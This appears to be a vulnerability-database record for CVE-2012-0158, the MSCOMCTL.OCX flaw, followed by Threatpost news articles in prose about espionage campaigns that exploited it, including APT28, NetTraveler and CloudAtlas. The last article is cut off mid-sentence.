The (1) ListView, (2) ListView2, (3) TreeView, and (4) TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 Runtime allow remote attackers to execute arbitrary code via a crafted (a) web site, (b) Office document, or (c) .rtf file that triggers "system state" corruption, as exploited in the wild in April 2012, aka "MSCOMCTL.OCX RCE Vulnerability."
{"threatpost": [{"lastseen": "2018-10-06T23:00:46", "description": "More and more, we\u2019re hearing about a crossing of the streams, if you will, between cybercrime and state-sponsored attackers. Elements of malware, code persistence and distribution techniques are bleeding over between one realm of hacking into the other as each side tries to fill gaps in their respective portfolios.\n\nThe most recent example comes from Safe, a targeted espionage malware campaign recently reported on by Trend Micro. Safe has all the elements of a state-sponsored endeavor yet it seems to have been written by a third-party professional software developer with textbook code snippets, extensive commenting throughout the source code and an air of commercialization.\n\n\u201cAs the tools used in targeted attacks are exposed, attackers may look for new custom malware to circumvent defenses. As a result, attackers may increasingly look to the cybercriminal underground for new malicious tools instead of developing their own tools for exclusive use,\u201d wrote Kyle Wilhoit and Nart Villeneuve in a paper.\n\nSafe, named after the filenames given to of the several malware components, has hit a relatively small number of targets, namely nongovernmental organizations (NGOs), technology companies, government agencies, academic research institutions and media companies. To date, nearly 12,000 unique IP addresses from more than 100 countries have connected to a pair of command and control infrastructures.\n\nEach command and control server had its own set of marching orders for the malware and targets. One snared just three live victims, the report said, most of those in Mongolia, while the other had significantly more, and most of those connections originated in India, the U.S., China and Pakistan.\n\nFrom clues discovered from a misconfiguration on one of the C&C servers, the researchers were able to see all of its directories, view victim information and download backup archives that included source code used for the server and malware.\n\n\u201cThis is realistically about a developer who may be cybercrime oriented, but a malware campaign that is espionage oriented,\u201d Wilhoit told Threatpost, who added that this type of professional code development is not uncommon in either the cybercrime or cyberespionage arenas.\n\nAttacks begin with spear phishing emails containing spiked Microsoft Office documents exploiting a vulnerability in CVE-2012-0158. The spear phishing messages are targeting Tibetan activists with information about an interview with the exiled Dalai Lama. The attachment is titled: NBC Interview Excerpts. CVE-2012-0158 was also used in the [Red October espionage campaign](<http://threatpost.com/inside-1000-red-october-cyberespionage-malware-modules-011713/>) as well as other attacks against [Tibetan activists](<http://threatpost.com/researchers-uncover-targeted-attack-campaign-using-android-malware-032613/>) in China or in exile elsewhere worldwide.\n\nOnce the document is executed, the victim sees a decoy document while files are downloaded in the background, including a .dll file called Safe.Ext which contains the malware and SafeCredential.DAT which contains an Rc4 encryption key as well as command and control server information and the targets. Each victim is assigned a unique identifier. The second stage of the attack then executes and a number of data exfiltration plug-ins are installed, as well as a number of credential-stealing tools targeting the major browsers and Remote Desktop Protocol.\n\nAside from the malware, the two C&C servers don\u2019t seem to have anything in common. While one uses Mongolian domain names, the second holds nonsensical domain names such as getapencil[.]com. No attack vectors have been discovered for the second server, Trend Micro said. The domains in the second server are registered to a wanxian at 126[.]com, the same address used to register another 17 domains including five C&C servers used in the iMuler and Enfal malware campaigns, Trend Micro said.\n\nThe researchers\u2019 access to the source code illustrated the professionalism at play with this campaign. Apparently, the author had access to source code from a Chinese ISP and used that code in the building of the C&C server.\n\n\u201cWe believe the malware author is a professional software engineer that is familiar with version control. We also found indicators that this individual is proficient in software development due to the high quality of the source code he used. The entire source code was explicitly written with future development in mind. It was modularized and heavily commented on in a way that allows further development even by several engineers,\u201d the paper said. \u201cThese qualities are traditionally seen in the work of professional software engineers that have been taught traditional computer science.\u201d\n\nWilhoit told Threatpost they are still investigating and would not release any specific information about targets or the types of data being exfiltrated.\n", "cvss3": {}, "published": "2013-05-20T14:47:14", "type": "threatpost", "title": "Safe Targeted Espionage Campaign Borrows from Cybercriminals", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2013-05-23T10:56:25", "id": "THREATPOST:2154D4513B1B000120D100B6FE1F0D83", "href": "https://threatpost.com/targeted-espionage-attack-borrowing-from-cybercriminals/100705/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:56", "description": "A Russian APT group tied to ongoing attacks against military and political targets in Eastern Europe and against NATO could also have ties to the [MiniDuke espionage campaign](<http://threatpost.com/miniduke-espionage-malware-hits-governments-europe-using-adobe-exploits-022713/77569>) uncovered more than a year ago.\n\nDubbed [APT28](<http://www.fireeye.com/resources/pdfs/apt28.pdf>) by FireEye in a report published last night, the Russian hackers have targeted Eastern European governments and military organizations, the government of the country of Georgia, as well as NATO and the Organization for Security and Cooperation in Europe (OSCE). The group, FireEye said, operates as a professional team with indicators of long-term software development planning and operational security tactics in place. They operate during business hours, on Moscow time, and use phishing lures specific to government and military officials of political and strategic value to the Russian government, the report said.\n\nKaspersky Lab Global Research & Analysis Team expert Aleks Gostev said this same group is also known as Sofacy and may have ties to the MiniDuke campaign. The [MiniDuke campaign also was used for political and military espionage](<http://threatpost.com/miniduke-apt-campaign-returns-with-new-targets-hacking-tools/107008>) but relied on a number of unusual tactics in a shotgun-style approach with 59 victims in 23 countries, most of those in Europe.\n\nLike MiniDuke, APT28 relies on phishing emails to penetrate organizations. The messages are spiked with convincing decoy documents that kick off a string of infections and backdoors where stolen information is ultimately encrypted and sent to a command and control server.\n\nLaura Galante, manager of threat intelligence at FireEye, said they have not been able to determine how successful APT28 has been with these three particular sets of targets.\n\n\u201cThat\u2019s part of the open question,\u201d Galante said. \u201cWe can see the targets in Eastern Europe by the lures they use and domains they\u2019ve registered, but we don\u2019t have perfect visibility on what they\u2019re doing with the targets they\u2019re able to compromise. If you can get into the email of an Eastern European military attache, what are they doing with the stolen communication? I would wager they\u2019re probably using it to think about their own policy decisions and shape their responses to military and political affairs.\u201d\n\nGalante said the malware and attack tools have been regularly updated and refined since 2007.\n\nGalante said the malware and attack tools have been regularly updated and refined since 2007. The development platforms are flexible and built for long-term use, and the coders are skilled not only at building custom malware, but also coding in barriers that complicate reverse engineering and other forensic analysis.\n\nFireEye said in its report that the malware samples include Russian language settings and were compiled in a Russian language build environment starting in 2007\u2014more than 96 percent of the samples were compiled between Monday and Friday and 89 percent between 8 a.m. and 6 p.m. UTC+4 time zone, FireEye said.\n\nThree primary targets all have political or military value to the Russian government. Attacks on one target, the Georgian government, ramped up following the 2008 war with Georgia and that country\u2019s subsequent growing ties to the West. Specifically, attacks against the Georgian Ministry of Internal Affairs and the Ministry of Defense were carried out. Spear phishing attacks tailored to particular people or organizations at each ministry were found, each with a different exploit for a Microsoft Office vulnerability.\n\n\u201cIn general, the group relies on older exploits, such as CVE-2012-0158, and it does not appear to be as sophisticated in terms of technical skills as other groups, for instance [Turla](<http://threatpost.com/epic-operation-kicks-off-multistage-turla-apt-campaign/107612>),\u201d Kaspersky\u2019s Gostev said.\n\nSeparate attacks were also discovered against the Eastern European Ministry of Foreign Affairs, the Polish government, NATO, OSCE, defense attaches working in Eastern European countries, and even attendees of European defense exhibitions, each following a similar pattern as other APT28 attacks, FireEye said.\n\n\u201cThe malware used in these attacks has some interesting features, but when you\u2019re thinking about how they\u2019re getting on networks, they\u2019re still relying on spear phishing,\u201d Galante said. \u201cThey\u2019re still requiring and dependent on a user mistake to get on a network.\u201d\n\nThe malware, Galante said, is custom built by the group. Once a victim opens a spear phishing email and executes the malware tucked in the tainted Office attachment, a dropper malware loads the Sofacy downloader which grabs second-stage malware from a command and control server, Galante said. A backdoor is established for anything from shellcode execution, credential theft and system monitoring. Implants are then dropped onto the victim\u2019s machine that include counter reverse-engineering features that disrupt static analysis of the malware. Stolen data is protected with RSA encryption as it moves from the victim to the controller, FireEye said.\n\nUnlike Chinese APT groups that have been unmasked, Galante said Russian groups don\u2019t generally steal intellectual property.\n\n\u201cWith the Russian group, the victim set is narrow and the type of operations occurring are distinct from intellectual property and financial data theft that the Chinese groups focus on,\u201d Galante said. \u201cThe majority of Chinese groups go after trade secrets to help their state-owned enterprises in China. Sure there is a military and political application to a lot of the information taken by Chinese groups, but the defining feature is secrets from economic sectors.\u201d\n", "cvss3": {}, "published": "2014-10-28T12:23:03", "type": "threatpost", "title": "Russian APT28 Group Linked to NATO, Political Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2014-10-28T16:23:03", "id": "THREATPOST:40683E270B24D8E2F0A7F7F90FDFE9A6", "href": "https://threatpost.com/russian-apt28-group-linked-to-nato-political-attacks/109049/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:47", "description": "A new malware campaign has been hitting Pakistan hard over the last few months and after a little e-sleuthing, it appears the not-so-stealthy attacks have been originating from nearby India and exploiting a certificate to run its binaries.\n\nSecurity firm Eset has a full rundown of the campaign today on its [WeliveSecurity.com](<http://www.welivesecurity.com/2013/05/16/targeted-threat-pakistan-india/>) blog by malware researcher Jean-Ian Boutin, including an array of details involving how the attack has been executed and the types of payloads being deployed on unsuspecting Pakistanis\u2019 computers.\n\nThis campaign relies on the exploitation of a bogus, digitally signed certificate from the Indian company Technical and Commercial Consulting Pvt. Ltd. Initially issued in 2011 and revoked for files used after March 2012. Still though the cert was still used to sign more than 70 different malicious binaries on and off from that March until September of that year.\n\nThe malware uses two vectors \u2013 the first is a well-known Word document vulnerability, CVE-2012-0158, that\u2019s been used in everything from the [Red October campaign](<http://threatpost.com/rocra-espionage-malware-campaign-uncovered-after-five-years-activity-011413/>) to a bevy of [attacks against Tibetan and Uyghur users](<http://threatpost.com/researchers-uncover-targeted-attack-campaign-using-android-malware-032613/>) as of late. The other vector spread Word and PDF files that once opened, \u201cdownloads and executes additional malicious binaries.\u201d Some of those files are disguised as \u201cpakistandefencetoindiantopmiltrysecreat.exe\u201d and \u201cpakterrisiomforindian.exe,\u201d according to the blog post.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/05/07045755/pakistan_india.jpg>)\n\nPayloads are set up to glean data \u2013 screenshots, keystrokes, documents in the computer\u2019s trash \u2013 from users\u2019 computers and in turn send them to the attackers\u2019 servers. Interestingly enough, as Boutin notes, the information is being uploaded to the attacker\u2019s computer unencrypted, so it\u2019s easy to see what exactly is being transferred.\n\nThe blog also notes a number of Indian connections, including the mysterious Indian code signing certificate, references to Indian culture in the binaries and signing timestamps between 5:06 and 13:45, consistent with eight hour shifts worked in India.\n\nAn accompanying graph in the blog entry suggests that while other nations are being hit by the campaign, it\u2019s largely affecting Pakistan, with 79 percent of the targets affecting that South Asian country.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/05/07045751/detection_distribution.png>)\n\nA similar type of malware, [Redpill](<http://threatpost.com/data-stealing-spyware-redpill-back-targeting-india-041113/>), was found hijacking users in India last month. That campaign also stole screenshots, in addition to bank account credentials and email information and was the second coming of a malware strain that made its first appearance in 2008.\n\nBoutin\u2019s full research on the malware targeting Pakistan is being presented at the Caro Workshop, a security conference in Bratislava, Slovakia tomorrow. For more on his research, head to [ESET\u2019s blog](<http://www.welivesecurity.com/2013/05/16/targeted-threat-pakistan-india/>).\n", "cvss3": {}, "published": "2013-05-16T16:04:21", "type": "threatpost", "title": "Spyware Campaign Originating in India Targeting Pakistanis", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2013-05-16T20:04:21", "id": "THREATPOST:7719EB430C620858B2504EA847A9A096", "href": "https://threatpost.com/new-india-based-spy-malware-campaign-targeting-pakistanis/100664/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:01", "description": "An APT gang linked to China and alleged to be responsible for targeted attacks against foreign governments and ministries, has now pointed its focus inward at China\u2019s autonomous territory Hong Kong.\n\nAn August attack against several media companies in Hong Kong was carried out shortly after a high-profile controversy over [an appointment at the prestigious Hong Kong University](<http://www.scmp.com/news/hong-kong/education-community/article/1844800/why-scuffle-hong-kong-universitys-appointment?page=all>). This is not the first time China has targeted media outlets, especially in Hong Kong, in particular seeking out journalists\u2019 sources and attempting to stay ahead of a news cycle. In January 2013, hackers, allegedly connected to the Chinese government, were blamed by Mandiant for a [breach at the _New York Times_](<https://threatpost.com/inside-targeted-attack-new-york-times-013113/77477/>)_._ The group targeted the email accounts of investigative journalists looking into alleged corruption involving then-Chinese premier Wen Jiabao.\n\nThe group targeting Hong Kong media outlets is called [admin@338](<https://threatpost.com/mh-370-related-phishing-attacks-spotted-against-government-targets/105024/>) and is known to researchers for using publicly available [remote access Trojans such as Poison Ivy](<https://threatpost.com/poison-ivy-rat-spotted-in-three-new-attacks/102022/>) to attack government and financial firms specializing in global economic policy.\n\nIn this case, researchers at FireEye said that this is one of the first instances this group has used [phishing lures written in Chinese](<https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html>) against targets. Three attachments accompanied each phishing email, all of which were exploits for a patched Microsoft Office vulnerability, [CVE-2012, 0158](<https://securelist.com/analysis/publications/37158/the-curious-case-of-a-cve-2012-0158-exploit/>), a buffer overflow in the Windows Common Control Library patched in early 2012.\n\nOnce executed, a backdoor called Lowball is dropped onto the compromised machine which then connects to a legitimate Dropbox account belonging to the attackers. This first stage of the attack runs a number of commands on the infected computer and sends the output to the Dropbox account, said FireEye principal threat analyst Nart Villeneuve. The attackers retrieve the information, analyze it, and if the target is worthy, a second stage backdoor is delivered called Bubblewrap, a much more traditional backdoor that is used for remote control and stealing data.\n\nVilleneuve said that APT gangs could soon be trending toward involving cloud-based services such as Dropbox as part of their attacks.\n\n\u201cThese attackers are using Dropbox because it provides them with a way to disguise their activities,\u201d Villeneuve said. \u201cAnyone looking at the traffic would see only encrypted connections going to Dropbox rather than traffic associated with known malware.\u201d\n\nThe phishing emails began showing up in the inboxes of Hong Kong-based newspapers, television and radio stations, targeting journalists with tidbits about current events including one purporting to be from alumni of Hong Kong University sharing their concerns over a vote to appoint a vice-chancellor at the school being influenced by Beijing. The first stage of the attack, Villeneuve said, is essentially reconnaissance. Once the exploit is executed, it connects to Dropbox using the service\u2019s API and creates a file in Dropbox using the name of the compromised host. The file contains IPconfig data, user and domain information, and lists of program files and recently created documents.\n\n\u201cThe attackers look at the information and determines if the target is of interest. If they are, they then put an executable in the Dropbox account so that the next time compromised host checks in, it pulls down the executable and a well-known backdoor is dropped giving them real-time access to the host.\u201d\n\nFireEye said it shared its findings with Dropbox, which investigated further and found a separate and larger attack that is likely connected to the same group.\n\n\u201c[Dropbox] found another set of activity using malware that was almost the same and in that case, the attack appeared to be much larger, about 50 targets,\u201d Villeneuve said, adding that the second attack is ongoing. \u201cWe are pretty sure this second cluster of activity is related. There\u2019s nothing we can link them to other than it looks the same, with multiple Dropbox accounts and a few more targets.\n", "cvss3": {}, "published": "2015-12-01T11:37:53", "type": "threatpost", "title": "China APT Gang Targets Hong Kong Media via Dropbox", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2015-12-01T16:37:53", "id": "THREATPOST:1842F12350B277A2FE1B6F4AF2F1BFDB", "href": "https://threatpost.com/china-apt-gang-targets-hong-kong-media-via-dropbox/115513/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:05", "description": "With antiquated gear running the country\u2019s industrial control systems that oversee critical infrastructure, it\u2019s no shock attackers targeting SCADA networks do their fair share of reconnaissance looking for weak spots in that equipment.\n\nA researcher decided to put that theory to a practical test recently when he deployed three dummy websites, honeypots essentially, that accurately mimicked Internet-facing management interfaces for a real-world water pressure station, a server hosting a human machine interface (HMI) system and another machine hosting a real programmable logic controller (PLC).\n\nWhat threat researcher Kyle Wilhoit of Trend Micro found during a 28-day trial was that attackers are determined to access SCADA networks and ICS devices and come armed not only with working knowledge of devices and their default configurations, but with purpose-built malware, and the desire to modify industrial processes if they\u2019re able to successfully access a system.\n\n\u201cI didn\u2019t expect the attack scenarios I saw happen,\u201d Wilhoit told Threatpost. \u201cI didn\u2019t expect attackers to look at the site admin stuff and deeper into the company behind the gear. I can now draw a parallel to the reconnaissance attackers do on companies and infrastructure; we see a lot of those parallels on devices now.\u201d\n\nDuring the trial, 39 attacks were carried out against the honeypots, originating in 14 countries, most of them coming from China, Laos and the United States. For the purposes of his [research](<http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-whos-really-attacking-your-ics-equipment.pdf>), which was presented at Black Hat EU last week, Wilhoit did not consider automated port scans and SQL injection attempts as attacks. The only attempts considered attacks were those that were a threat to a secure area of the websites, attempts to modify a controller, attacks on specific SCADA protocols such as Modbus, and attempts to gain access to cause damage.\n\nThe sites were left exposed online with default configurations, including default credentials such as admin/admin or SA/SA. Text on the sites was optimized for search engines so that Google and others would easily find them, and the server names, for example, were fairly attractive names such as SCADA-1.\n\nThe result was a disturbing view into the activities around these critical systems. One incursion was able to gain access to a supposed water pumping station and shut it down or modify water output temperatures, in one case to 170 degrees Fahrenheit.\n\n\u201cThey logged in, made a modification and logged out,\u201d Wilhoit said. \u201cThese were repeat attacks based on default credentials for specific ICS and SCADA equipment. They were able to modify it directly and perform what was perceived to be catastrophic damage. They definitely thought they were successful.\u201d\n\nWilhoit said 12 of the attacks were unique and targeted the specific equipment in use; 13 were repeated by the same attackers, indicating some sort of automation and targeting. Some attackers would come back at the same times twice a day and try to exploit the same vulnerabilities over and over, or move on to new attacks once they were unable to exploit one.\n\nMost of the attacks logged by the honeypots were unauthorized access attempts to diagnostics pages, or attempts to modify Modbus traffic; Modbus is a communications protocol specific to ICS and SCADA equipment. One of the malware attacks originated with a spear phishing email carrying a malicious Word document exploiting [CVE-2012-0158](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>), a vulnerability that enables remote code execution used in many targeted attacks. Another attack attempted to use an unauthorized Modbus client to gain read/write access to the PLC honeypot, a sign reconnaissance is occurring, Wilhoit said.\n\nThe bigger question, however, is why. Why is this gear online with default credentials and configurations and how many attacks where pumping stations are shut down or water temperature is modified occur?\n\n\u201cThe primary reason this is occurring is that these systems were deployed 20 to 30 years ago, prior to security architecture being the way it is today,\u201d Wilhoit said. \u201cThe technology gap has gotten a lot larger, and ICS hasn\u2019t caught up to where security infrastructure is at right now. It\u2019s difficult for devices to be turned down; that will halt business in that sector for some time. If you reboot a server, coal is not coming out of the ground. That affects the bottom line.\n\n\u201cIt also begs the question: Are companies disclosing it, or are they even aware it\u2019s occurring,\u201d Wilhoit said. \u201cThere\u2019s quite a big separation from the security guy and the ICS engineer whose main responsibility is to ensure devices stay up and are operational. Would they even be aware? I don\u2019t know, but I\u2019d be comfortable in saying these types of attacks are occurring.\u201d\n", "cvss3": {}, "published": "2013-03-19T19:04:12", "type": "threatpost", "title": "Attacks on SCADA, ICS Honeypots Modified Critical Operations", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2013-05-07T19:38:25", "id": "THREATPOST:BBF9233468A677A95C5E9D149089804E", "href": "https://threatpost.com/attacks-scada-ics-honeypots-modified-critical-operations-031913/77642/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:43", "description": "The attackers behind the [Red October APT campaign](<https://threatpost.com/rocra-espionage-malware-campaign-uncovered-after-five-years-activity-011413>) that was exposed nearly two years ago have resurfaced with a new campaign that is targeting some of the same victims and using similarly constructed tools and spear phishing emails.\n\nRed October emerged in January 2013 and researchers found that the attackers were targeting diplomats in some Eastern European countries, government agencies and research organizations with malware that could steal data from desktops, mobile devices and FTP servers. The attackers had a wide variety of tools at their disposal and used unique victim IDs and had exploits for a number of vulnerabilities. The Red October attacks began with highly targeted spear phishing emails, some of which advertised a diplomatic car for sale.\n\nThe new CloudAtlas campaign, disclosed Wednesday by researchers at Kaspersky Lab, also uses that same spear phishing lure and as targeted some of the same victims hit by Red October. Researchers believe the same group may be behind both campaigns, based on similarities in tactics, tools and targets.\n\n\u201cIn August 2014, some of our users observed targeted attacks with a variation of [CVE-2012-0158](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>) and an unusual set of malware. We did a quick analysis of the malware and it immediately stood out because of certain unusual things that are not very common in the APT world,\u201d researchers at Kaspersky said in an [analysis](<https://securelist.com/blog/research/68083/cloud-atlas-redoctober-apt-is-back-in-style/>) of the attack. \n\n\u201cAt least one of them immediately reminded us of RedOctober, which used a very similarly named spearphish: \u201cDiplomatic Car for Sale.doc\u201d. As we started digging into the operation, more details emerged which supported this theory. Perhaps the most unusual fact was that the Microsoft Office exploit didn\u2019t directly write a Windows PE backdoor on disk. Instead, it writes an encrypted Visual Basic Script and runs it.\u201d\n\nBoth Red October and CloudAtlas have targeted the same victims. Not just the same organizations, but some of the same machines.\n\nBoth Red October and CloudAtlas have targeted the same victims. Not just the same organizations, but some of the same machines. In one case, a machine was attacked only twice in the last two years, once by Red October and once by CloudAtlas. Both campaigns also hit victims in the same countries: Russia, Belarus, Kazakhstan and India. The two campaigns also use similar malware tools.\n\n\u201cBoth Cloud Atlas and RedOctober malware implants rely on a similar construct, with a loader and the final payload that is stored encrypted and compressed in an external file. There are some important differences though, especially in the encryption algorithms used \u2013 RC4 in RedOctober vs AES in Cloud Atlas,\u201d Kaspersky researchers said.\n\n\u201cThe usage of the compression algorithms in Cloud Atlas and RedOctober is another interesting similarity. Both malicious programs share the code for LZMA compression algorithm. In CloudAtlas it is used to compress the logs and to decompress the decrypted payload from the C&C servers, while in Red October the \u2018scheduler\u2019 plugin uses it to decompress executable payloads from the C&C.\u201d\n\nThe C2 infrastructure for the CloudAtlas campaign is somewhat unusual. The attackers are using accounts at Swedish cloud provider CloudMe to communicate with compromised machines.\n\n\u201cThe attackers upload data to the account, which is downloaded by the implant, decrypted and interpreted. In turn, the malware uploads the replies back to the server via the same mechanism,\u201d the researchers said.\n\nOfficials at CloudMe said on Twitter that they are working to delete any CloudAtlas C2 accounts.\n\n\u201cYes, we are permanently deleting all accounts that we can identify as involved in the [#inception](<https://twitter.com/hashtag/inception?src=hash>) [#cloudatlas](<https://twitter.com/hashtag/cloudatlas?src=hash>) [#apt](<https://twitter.com/hashtag/apt?src=hash>) [#surveillance](<https://twitter.com/hashtag/surveillance?src=hash>),\u201d the company [said](<https://twitter.com/CloudMe_com/status/542636290274246656>).\n\nResearchers at Blue Coat have also looked at the new campaign, which they\u2019ve named Inception, and found that the attackers have created tools to compromise a variety of mobile platforms, as well.\n\n\u201cThe framework continues to evolve. Blue Coat Lab researchers have recently found that the attackers have also created malware for Android, BlackBerry and iOS devices to gather information from victims, as well as seemingly planned MMS phishing campaigns to mobile devices of targeted individuals. To date, Blue Coat has observed over 60 mobile providers such as China Mobile, O2, Orange, SingTel, T-Mobile and Vodafone, included in these preparations, but the real number is likely far higher,\u201d Snorre Fagerland and Waylon Grange from Blue Coat Lab wrote.\n\n_Image from Flickr photos of [Kevin Dooley](<https://www.flickr.com/photos/pagedooley/>). _\n", "cvss3": {}, "published": "2014-12-10T11:12:07", "type": "threatpost", "title": "Red October Attackers Return With CloudAtlas APT Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2014-12-11T17:50:33", "id": "THREATPOST:3DFDEBADB4BEE8782EFBEA4D06EB5605", "href": "https://threatpost.com/red-october-attackers-return-with-cloudatlas-apt-campaign/109806/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:45", "description": "Researchers have discovered a mature attack platform that\u2019s enjoyed great success eluding detection and made good use of an exploit present in a number of espionage campaigns.\n\nThe attacks have concentrated largely on the automotive industry, hitting large companies primarily in Asia and only after being tested against activist targets in the region. Nicknamed [Grand Theft Auto Panda](<http://www.cylance.com/techblog/Grand-Theft-Auto-Panda.shtml>) by researcher Jon Gross of Cylance, the attacks rely on the well-worn exploits used against [CVE-2012-0158](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158>). Malicious Microsoft Office documents are sent to the victim, who must interact with the .xls, .doc, or other file in a phishing email or website in order to exploit the vulnerability and inject malware or cause a service disruption.\n\nThese attacks are not carried out on the same scale as those by the [Comment Crew](<http://threatpost.com/comment-crew-expos-new-level-china-attack-attribution-021913>) or other high profile APT gangs. Specific targets are chosen in these campaigns, and those targets are phished with convincing messaging, such as a negative customer service review as in one attack spotted by Cylance.\n\nThe platform has been around for a few years and can be used to steal not only system and network information, but documents and credentials, in addition to opening a backdoor connection to the attacker in order to move stolen data.\n\n\u201cIt\u2019s more of an extensible platform to where they can add in any functionality they want as a plug-in. It\u2019s more of an infection framework than any specific Trojan,\u201d Gross said. \u201cThey can modify the components over time and not have to really worry about it if the main component is never detected. This is more like extensible platform where they add in functionality, screen capture, key logging, they just send it up as a plug in.\u201d\n\nCVE-2012-0158, meanwhile, has been a favorite among nation-state attackers seeking to infiltrate corporations or activist groups for espionage or surveillance. It was detected in the [Icefog](<http://threatpost.com/icefog-espionage-campaign-is-hit-and-run-targeted-operation/102417>) and [NetTraveler](<http://threatpost.com/net-traveler-espionage-campaign-uncovered-links-to-gh0st-rat-titan-rain-found/100865>) campaigns discovered by Kaspersky Lab. Both were linked to operatives in China and follow similar patterns as GTA Panda in that that they\u2019re attacking both activists and manufacturing companies.\n\n\u201cWe see a lot people who are attacking industries, also attacking human rights groups. We\u2019ve always thought it just comes down as a directive from whomever to test this against them,\u201d Gross said. \u201cWe see a lot of new malware tested against human rights activists before it ever makes its way to the corporate environments. The original stuff I found was not targeted against human rights, but as I dug into it, I saw more and more stuff that was also additionally targeting human rights; and that was older stuff before they moved on to corporations.\u201d\n\n[NetTraveler](<http://threatpost.com/nettraveler-variant-adds-java-exploits-watering-hole-attacks-to-bag-of-tricks/102156>), for example, made use of the CVE-2012-0158 Office exploits to target the Uyghur and Tibetan activists, before moving on to oil and energy companies as well as diplomats and government agencies around the world.\n\n\u201cIt\u2019s kinda like a Darwinian evolution of malware. If it passes the first test, it\u2019s survival of the fittest. The things that don\u2019t get detected get reused,\u201d Gross said. \u201cHuman rights are almost like a playground. They\u2019re always a target, and we see a lot of malware that\u2019s used against them before anyone else.\u201d\n\nAs for the platform, its staying power is due to its stealth.\n\n\u201cThe big thing is moving functionality out of the actual files that get loaded into [victims\u2019 machines] because then it doesn\u2019t look suspicious until that file subsequently loads something else that performs the malicious activity,\u201d Gross said. \u201cThe malicious components are sitting there encrypted on disk, where your typical security product is not going to find that unless they already know about it.\u201d\n\nThere are also layers of encryption protecting the attack that shield it from detection, Gross said. As for the exploits, lax patching is likely the biggest culprit; in this case, CVE-2012-0158 was patched more than 18 months ago by Microsoft. Combine that with effective social engineering in the phishing messaging\u2014in particular from spoofed, trusted email addresses\u2014and that\u2019s a potent cocktail for trouble.\n\n\u201cIf you get emails that look like they\u2019re coming from trusted parties and people you usually communicate with, then our guard drops and we\u2019re much more likely to say OK, I\u2019ll open that,\u201d Gross said. \u201cI think they rely on that really heavily, especially with the activist community because they know all these people and they know who they communicate with on a regular basis and they try to make it look like it comes from them. Their guard\u2019s totally down and they\u2019re not worried about it.\u201d\n", "cvss3": {}, "published": "2013-11-25T10:26:50", "type": "threatpost", "title": "Grand Theft Auto Panda APT Espionage Attack Platform", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2013-11-27T20:28:16", "id": "THREATPOST:440B0C9A3453F28AD6AABD6CD97AA074", "href": "https://threatpost.com/extensible-attack-platform-has-familiar-feel/103021/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:38", "description": "Never let it be said that attackers don\u2019t keep up with the news. The crew behind the [NetTraveler cyberespionage attacks](<https://threatpost.com/net-traveler-espionage-campaign-uncovered-links-to-gh0st-rat-titan-rain-found/>) is now using the news about the NSA\u2019s PRISM surveillance program as bait in a new spear-phishing campaign.\n\nSecurity researcher Brandon Dixon of 9bplus came across a malicious email this week that plays off the recent spate of news stories about the leaked data on the National Security Agency\u2019s PRISM program, which is designed to gather data on users from a variety of large Internet companies, reportedly including Microsoft, Apple, Google and others. The email is designed to look like it was sent by Jill Kelley, the woman who helped expose the affair that David Petraeus was having.\n\nDixon said that the message was targeted at someone involved with the Regional Tibet Youth Congress in India and included a malicious Word document that had many of the earmarks of the tactics used by the NetTraveler attackers.\n\n\u201cThe attachment is a Word document labeled \u2018Monitored List 1.doc\u2019, exploiting the always favored CVE-2012-0158 and can be tied back to the same actors involved in the [NetTraveler campaigns](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/22105818/kaspersky-the-net-traveler-part1-final.pdf>) brought to light by Kaspersky. It\u2019s funny to note that these actors are keeping up with their same techniques and infrastructure (not all of it) despite being 100% outed. Again, this sort of behavior shows poor operational security or a complete lack of care,\u201d Dixon wrote in his [analysis of the email](<http://blog.9bplus.com/prism-lure-in-use-by-nettraveler-attackers/>).\n\nThe text of the email is crammed with somewhat nonsensical text mentioning the [NSA PRISM 